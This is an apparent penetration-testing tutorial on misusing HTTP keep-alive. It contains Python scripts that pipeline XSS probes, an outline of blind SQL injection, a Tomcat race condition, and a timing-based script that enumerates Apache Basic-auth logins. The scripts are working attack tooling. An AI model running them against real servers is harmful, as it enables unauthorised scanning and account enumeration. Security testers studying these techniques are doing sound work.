Before turning to unconventional uses, I will describe how “keep-alive” works. The process is utterly simple: multiple requests are sent over a single connection instead of just one, and multiple responses come back from the server. The benefits are obvious: less time is spent on establishing connections, and there is less load on CPU and memory. The number of requests in a single connection is usually limited by the server settings (in most cases, at least several dozen are allowed). The procedure for establishing such a connection is universal:
1. With HTTP/1.0, the first request must contain the header Connection: keep-alive. With HTTP/1.1, connections are persistent by default and the header is not required, but some servers will automatically close connections that are not explicitly declared persistent. A header such as Expect: 100-continue can also get in the way. So, to avoid errors, it is recommended to add Connection: keep-alive to every request explicitly.
2. When a ‘keep-alive’ connection is requested, the server looks for the end of the first request. If the request carries no data, it ends at the blank line after the headers, that is, at a double CRLF (‘\r\n\r\n’, although often just two ‘\n’ will also work fine). The request is considered to carry no data if it has neither a ‘Content-Length’ nor a ‘Transfer-Encoding’ header, or if these headers have a zero or invalid value. If they are present and valid, the request ends at the last content byte of the declared length.
3. If there is more data after the first request, steps 1 and 2 are repeated for it until no correctly formed requests remain.
Sometimes, even when the request is terminated correctly, ‘keep-alive’ does not work as it should because of some unknown “magical” characteristics of the server or of the script the request is addressed to. In this case, forcing the connection to initialize with a HEAD request first may prove helpful.
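The steps above can be sketched as a small helper that glues several requests into one blob. This is only an illustration under my own assumptions: the name build_pipeline and its parameters are hypothetical, the requests carry no body (so each one ends at the blank line), and the last request asks the server to close the connection.

```python
def build_pipeline(host, paths, method="GET", head_first=False):
    """Return one bytes blob holding a keep-alive request for every path."""
    requests = []
    if head_first and paths:
        # Optional warm-up HEAD request for servers that need a "push"
        requests.append(("HEAD", paths[0], "keep-alive"))
    for i, path in enumerate(paths):
        last = i == len(paths) - 1
        # Only the final request asks the server to close the connection
        requests.append((method, path, "close" if last else "keep-alive"))
    blob = ""
    for verb, path, conn in requests:
        # No body, so every request ends at the blank line (double CRLF)
        blob += "%s %s HTTP/1.1\r\nHost: %s\r\nConnection: %s\r\n\r\n" % (
            verb, path, host, conn)
    return blob.encode("ascii")
```

For example, build_pipeline("host.test", ["/page0.php", "/page1.php"], head_first=True) yields three requests that can be written to a socket in a single call.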
Thirty by one or one by thirty?
No matter how funny it may sound, the first and most obvious benefit is the ability to speed up certain types of web application scanning. Let’s review a simple example: we need to check a certain XSS vector in an application that consists of ten scripts. Each script accepts three parameters.
I wrote a small Python script that runs through all the pages and checks all the parameters one by one, then displays the vulnerable scripts and parameters (let’s say there are four vulnerabilities) and the time spent on scanning.
    import socket, time

    print("\n\nScan is started...\n")
    s_time = time.time()
    # Marker that shows up in the response if the payload is reflected unescaped
    pattern = "<script>alert('xzxzx"
    for pg_n in range(0, 10):
        for prm_n in range(0, 3):
            # A new TCP connection for every single request
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(("host.test", 80))
            req = "GET /page"+str(pg_n)+".php?param"+str(prm_n)+"=<script>alert('xzxzx')</script> HTTP/1.1\r\nHost: host.test\r\nConnection: close\r\n\r\n"
            s.sendall(req.encode())
            res = s.recv(64000).decode(errors="replace")
            if res.find(pattern) != -1:
                print("Vulnerable page"+str(pg_n)+":param"+str(prm_n))
            s.close()
    print("\nTime: %s" % (time.time() - s_time))
Let's run it locally. The runtime was 0.690999984741 seconds.
Now let's run the same thing against a remote resource. In this case, the result was 3.0490000248 seconds.
Not bad, but now let's use 'keep-alive'. We will rewrite the script so that it sends all thirty requests over one connection and then parses the response to extract the required values.
    import socket, time

    print("\n\nScan is started...\n")
    s_time = time.time()
    req = ""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("host.test", 80))
    # Queue all thirty requests; each payload names its own page and parameter
    for pg_n in range(0, 10):
        for prm_n in range(0, 3):
            req += "GET /page"+str(pg_n)+".php?param"+str(prm_n)+"=<script>alert('xzxzx:page"+str(pg_n)+":param"+str(prm_n)+":yzyzy')</script> HTTP/1.1\r\nHost: host.test\r\nConnection: keep-alive\r\n\r\n"
    # A final HEAD request closes the connection
    req += "HEAD /page0.php HTTP/1.1\r\nHost: host.test\r\nConnection: close\r\n\r\n"
    s.sendall(req.encode())
    # Timeout for correct keep-alive
    time.sleep(0.15)
    res = s.recv(640000000).decode(errors="replace")
    pattern = "<script>alert('xzxzx"
    strpos = 0
    if res.find(pattern) != -1:
        for z in range(0, res.count(pattern)):
            strpos = res.find(pattern, strpos+1)
            # Skip the 20-character pattern and the colon; "pageN:paramM" is 12 characters
            print("Vulnerable "+res[strpos+21:strpos+33])
    s.close()
    print("\nTime: %s" % (time.time() - s_time))
Let's run it locally: the result is 0.167000055313 seconds. Running the 'keep-alive' version against the remote resource gives 0.393999814987 seconds.
And all this despite the fact that I had to add 0.15 seconds to avoid problems caused by the way the request is sent from Python. A very tangible difference, isn't it? And what if you had thousands of such pages?
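One possible way to get rid of the fixed pause is to keep reading until the server closes the socket. Here is a minimal sketch, assuming the last request in the batch carries Connection: close so that the server really does close the connection. The name recv_until_closed and its parameters are hypothetical, and the timings quoted in this article were not measured with it.

```python
import socket

def recv_until_closed(sock, timeout=5.0, chunk_size=65536):
    """Read from sock until the peer closes the connection or a read times out."""
    sock.settimeout(timeout)
    chunks = []
    while True:
        try:
            data = sock.recv(chunk_size)
        except socket.timeout:
            break  # the server kept the connection open; return what we have
        if not data:
            break  # an empty read means the peer closed the connection
        chunks.append(data)
    return b"".join(chunks)
```

The result is the raw byte stream of all responses, which can then be searched the same way as res in the script above.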
Of course, advanced products do not scan in a single thread, but the server settings may limit the number of threads allowed. In general, if you distribute the requests intelligently, the load with a persistent connection will be lower and the results will arrive faster. Besides, penetration testers face a variety of tasks, which often require custom scripts.
Shooting with injections
One such frequently encountered routine task is the character-by-character exploitation of blind SQL injections. If we are not worried about the server (and it is unlikely to "feel" any worse than when you extract everything character by character or with a binary search in multiple threads), then we can use 'keep-alive' here as well to get maximum results with a minimum number of connections.
The operating principle is simple. We collect the requests for all candidate characters into a single packet and send it. If one of the responses matches the 'true' condition, all that remains is to parse the responses: the position of the successful response gives the number of the desired character.
Again, this can be useful if the number of threads is limited or if you cannot use other methods that speed up character enumeration.
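The principle can be sketched roughly as follows. Everything here is an assumption made for illustration: the function names, the URL template, the injection template and the 'true' marker are hypothetical, and the response splitter only understands responses that declare Content-Length (no chunked encoding).

```python
from urllib.parse import quote

def build_char_probes(host, path_template, payload_template, position, alphabet):
    """One keep-alive GET per candidate character; the last one closes."""
    parts = []
    for i, ch in enumerate(alphabet):
        # The injected condition should be true only for the right character
        payload = payload_template.format(pos=position, code=ord(ch))
        conn = "close" if i == len(alphabet) - 1 else "keep-alive"
        path = path_template.format(payload=quote(payload, safe=""))
        parts.append("GET %s HTTP/1.1\r\nHost: %s\r\nConnection: %s\r\n\r\n"
                     % (path, host, conn))
    return "".join(parts).encode("ascii")

def split_responses(raw):
    """Split a pipelined response stream into (head, body) pairs."""
    responses = []
    pos = 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break  # truncated stream
        head = raw[pos:head_end].decode("latin-1")
        length = 0
        for line in head.split("\r\n")[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        body_start = head_end + 4
        responses.append((head, raw[body_start:body_start + length]))
        pos = body_start + length
    return responses

def first_true_index(responses, marker):
    """Index of the first response whose body contains the 'true' marker."""
    for i, (_, body) in enumerate(responses):
        if marker in body:
            return i
    return None
```

Since the responses come back in the same order as the requests, alphabet[first_true_index(...)] is the character at the probed position, provided that exactly one condition evaluated to true.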
Because with a 'keep-alive' connection the server does not spawn additional threads to handle the requests but methodically executes them in queue order, we can achieve lower latency between two requests. In certain circumstances, this can be used to exploit logic errors of the 'race condition' type. But is there anything here that you can't do with several parallel threads? Nevertheless, here is an example of an exceptional situation that can occur only with 'keep-alive'.
Let's try to modify a file in Tomcat through a Java script:
Everything is OK: both the script and the server can see that the file was modified. Now let's add to our sequence, before the modification request, a 'keep-alive' request for the content of the file. The server does not want to put up with the betrayal.
The script (and the OS too, I should note) sees perfectly well that the file was modified. But the server… For another five seconds, Tomcat will keep serving the previous content of the file before replacing it with the current one.
In a complex web application, this makes it possible to create a "race": one part relies on information from the server that has not been updated yet, while another has already received the new values. Anyway, now you know what to look for.
How to stop time
Finally, I will give you a curious example of a technique used to stop time. Or, more precisely, to slow it down.
Let's take a look at how the 'mod_auth_basic' module of the Apache httpd server works. 'Basic' authorization goes like this: first, the server checks whether there is an account with the user name sent in the request. Then, if such an account exists, the server computes a hash of the transmitted password and checks it against the hash stored for the account. Computing the hash takes some system resources, so the response arrives a couple of milliseconds later than when the user name matches nothing (in fact, the result depends heavily on the server configuration, its performance, and sometimes even on the position of the stars in the sky). If you could see the difference between the requests, you could enumerate logins in the hope of finding those that definitely exist in the system. However, with regular requests the difference is almost impossible to detect, even on a local network.
To increase the delay, you can send a longer password. In my case, with a 500-character password, the difference in response times grew to 25 milliseconds. Over a direct connection this may actually be exploitable, but over the Internet it is no good at all.
Here our favorite 'keep-alive' mode comes to the rescue: all requests are executed in sequence, one after the other, so the total delay is multiplied by the number of requests in the connection. In other words, if we can send 100 requests in a single packet, then with a 500-character password the delay grows to 2.5 seconds (100 × 25 ms). That is enough for reliable enumeration of logins over a remote connection, not to mention the local network.
It is better if the last request in the 'keep-alive' sequence closes the connection with Connection: close. This avoids the unnecessary timeout of 5 seconds (depending on the server settings) during which the server waits for the sequence to continue. I jotted down a small script for this.
    import socket, base64, time

    print("BASIC Login Bruteforce\n")
    logins = ("abc", "test", "adm", "root", "zzzzz")
    for login in logins:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("host.test", 80))
        # A 500-character password makes the hash check take longer
        cred = base64.b64encode((login+":"+("a"*500)).encode()).decode()
        payload = "HEAD /prvt/ HTTP/1.1\r\nHost: host.test\r\nAuthorization: Basic "+cred+"\r\n\r\n"
        # 100 identical requests in a single connection
        multipayload = payload * 100
        start_time = time.time()
        s.sendall(multipayload.encode())
        r = s.recv(640000)
        print("For "+login+" = %s sec" % (time.time() - start_time))
        s.close()
Even in this case, it makes sense to always use HEAD to make sure the entire sequence runs smoothly.
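The script above repeats the same request 100 times and leaves the connection open. A variant that follows the advice about Connection: close on the last request might build the batch like this. It is a sketch only: build_basic_batch and its parameters are hypothetical names, and count is assumed to be at least 1.

```python
import base64

def build_basic_batch(host, path, login, password, count):
    """Return `count` HEAD requests with Basic credentials; only the last one closes."""
    cred = base64.b64encode(("%s:%s" % (login, password)).encode()).decode("ascii")

    def request(conn):
        return ("HEAD %s HTTP/1.1\r\nHost: %s\r\nAuthorization: Basic %s\r\n"
                "Connection: %s\r\n\r\n" % (path, host, cred, conn))

    # count - 1 keep-alive requests followed by a single closing request
    batch = request("keep-alive") * (count - 1) + request("close")
    return batch.encode("ascii")
```

The result of build_basic_batch("host.test", "/prvt/", login, "a" * 500, 100) can be sent in place of multipayload.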
Let's run it!
That's what had to be proven: 'keep-alive' can be useful not only for speeding responses up but also for slowing them down. The same trick may also give you an edge when a web application compares strings or characters, or simply help you track the timing of any operation more precisely.
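To turn the measured times into a verdict, one simple heuristic is to compare every login against the median time of the whole batch. This is my own illustrative assumption rather than part of the script above: the name likely_valid_logins and the factor of 2.0 are arbitrary, and the approach only works if most of the candidate logins do not exist.

```python
import statistics

def likely_valid_logins(timings, factor=2.0):
    """Return logins whose batch time exceeds factor times the median batch time."""
    # The median approximates the time for a non-existent login,
    # as long as most candidates do not exist
    baseline = statistics.median(timings.values())
    return sorted(login for login, t in timings.items() if t > factor * baseline)
```

Here timings is a dictionary that maps each login to the time measured for its batch of requests.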
In fact, the range of uses for persistent connections is much broader. With such connections, some servers start to behave unusually, and you can stumble upon interesting logic errors in the architecture or catch funny bugs. Overall, this is a useful tool to keep in your arsenal for regular use. Stay tuned!
A few words from the author
In my daily work, I mostly use Burp Suite. However, for real exploitation, it is much easier to jot down a simple script in any convenient language. I should also note that the connection mechanisms of different languages give surprisingly different results against different servers. For example, Python sockets were unable to properly brute-force Apache httpd 2.4, but they do a wonderful job on version 2.2. So, if something doesn't work, it is worth trying another client.